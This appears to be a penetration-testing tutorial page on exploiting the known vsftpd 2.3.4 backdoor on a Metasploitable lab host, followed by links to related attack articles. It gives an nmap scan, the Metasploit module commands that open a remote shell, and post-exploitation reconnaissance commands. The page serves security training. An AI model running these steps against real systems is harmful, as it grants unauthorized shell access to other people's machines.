VSFTPD v2.3.4 Backdoor

Attack FTP Service – This module exploits a malicious backdoor that was added to the VSFTPD download archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011 according to the most recent information available. This backdoor was removed on July 3rd 2011.

db_nmap 172.16.74.129 -sC -A -vvv

vsftpd 2.3.4

First open metasploit and search for the vulnerable service vsftpd 2.3.4

search vsftpd

search 73573

use exploit/unix/ftp/vsftpd_234_backdoor

set RHOSTS 172.16.74.129

run

Invoke Bash Shell

> shell

> bash

> whoami

> uname -a

> ip a | grep inet4

References

OSVDB-73573

Attack Samba Server Port 445 – Metasploitable

https://security.appspot.com/vsftpd.html

Learn How to Bruteforce FTP Service

How to Attack FTP Servers port 21

Categorized in:

Network Penetration Testing Penetration Testing

Learn How to Attack FTP Service vsftpd 2.3.4

VSFTPD v2.3.4 Backdoor

vsftpd 2.3.4

Invoke Bash Shell

References

Learn How to Bruteforce FTP Service

Other Stories

How to Brute force FTP Services

How To Attack Linux Samba Port 139 The Easy Way!

HTB Napper Machine – Full Writeup

Protected: HTB Authority Machine – CompleteWriteup

Protected: HTB Manager Machine – Full Writeup

Don’t miss these tips!

HTB Napper Machine – Full Writeup

Protected: HTB Authority Machine – CompleteWriteup

Protected: HTB Manager Machine – Full Writeup

Protected: HTB Codify Machine – Full Writeup

VSFTPD v2.3.4 Backdoor

vsftpd 2.3.4

Invoke Bash Shell

References

Learn How to Bruteforce FTP Service

Related Articles

Other Stories

How to Brute force FTP Services

How To Attack Linux Samba Port 139 The Easy Way!